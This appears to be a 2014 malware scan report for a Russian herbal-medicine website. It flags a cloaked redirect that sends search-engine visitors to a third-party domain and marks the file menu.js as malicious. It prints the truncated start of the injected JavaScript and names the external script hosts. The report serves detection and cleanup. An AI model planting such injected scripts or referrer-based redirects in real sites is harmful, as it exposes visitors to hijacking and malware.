Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.med-herbal.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.med-herbal.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 15 Jul 2014 22:14:22 GMT Pragma: no-cache Location: http://site.portrelay.com/ Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=lispaoqkicd15jia2dmg17hoi0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze8 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.med-herbal.ru/ | 200 OK Content-Length: 27687 Content-Type: text/html | clean |
http://www.med-herbal.ru/engine/ajax/menu.js | 200 OK Content-Length: 4349 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); Antivirus reports:
| ||
http://www.med-herbal.ru/engine/ajax/dle_ajax.js | 200 OK Content-Length: 6148 Content-Type: application/x-javascript | clean |
http://www.med-herbal.ru/engine/ajax/js_edit.js | 200 OK Content-Length: 8271 Content-Type: application/x-javascript | clean |
http://adversni.com/b1xa/6d8/094/ | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://www.med-herbal.ru/7-dikorastushhie-rasteniya.html | 200 OK Content-Length: 17583 Content-Type: text/html | clean |
http://masudel.com/50bb20bb/98a/8/46e/39b08 | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://www.med-herbal.ru/dikie_rasteniya/ | 200 OK Content-Length: 16249 Content-Type: text/html | clean |
http://www.med-herbal.ru/user/admin/ | 200 OK Content-Length: 15670 Content-Type: text/html | clean |
http://www.med-herbal.ru/user/admin/news/ | 200 OK Content-Length: 28920 Content-Type: text/html | clean |
http://www.med-herbal.ru/10-air-otvar-iz-aira-najstoka-iz-aira-nastoj-aira.html | 200 OK Content-Length: 18210 Content-Type: text/html | clean |
http://www.med-herbal.ru/lekarstvennye_rasteniya/ | 200 OK Content-Length: 25233 Content-Type: text/html | clean |
http://www.med-herbal.ru/6-sbor-pererabotka-i-xranenie-lekarstvennyx-rastenij.html | 200 OK Content-Length: 22569 Content-Type: text/html | clean |
http://www.med-herbal.ru/index.php?do=register | 200 OK Content-Length: 14449 Content-Type: text/html | clean |
http://www.med-herbal.ru/lekarstvennye_rasteniya | 200 OK Content-Length: 25233 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=med-herbal.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://med-herbal.ru/
Result: med-herbal.ru is not infected or malware details are not published yet.
Result: med-herbal.ru is not infected or malware details are not published yet.